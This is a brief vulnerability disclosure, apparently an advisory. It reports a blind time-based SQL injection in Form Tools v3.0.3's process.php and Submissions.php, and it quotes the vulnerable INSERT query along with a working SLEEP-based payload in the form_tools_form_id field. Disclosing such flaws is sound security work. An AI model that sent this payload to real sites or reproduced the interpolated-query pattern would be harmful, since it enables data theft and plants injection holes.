While testing a website with the installed formtools framework (v3.0.3) a blind time based SQL injection in the process.php was found, processing forms using the Submissions.php.
The vulnerable code in the Submissions.php at the moment looks like this:

$db->query("
                    INSERT INTO {PREFIX}form_$form_id ($col_names_str) -- 
                    VALUES ($placeholders_str)
                ");

By posting the query

form_tools_form_id=5+(submission_date)+SELECT+(IF(@@USER LIKE '',SLEEP(10),SLEEP(0)));%00

the query executed on the database resulted in

INSERT INTO form_5 (submission_date) SELECT (IF(@@USER LIKE '', SLEEP(10), SLEEP(0))); --

which allowed the attacker to exfiltrate data. Despite looking strange the INSERT INTO SELECT is a valid SQL syntax.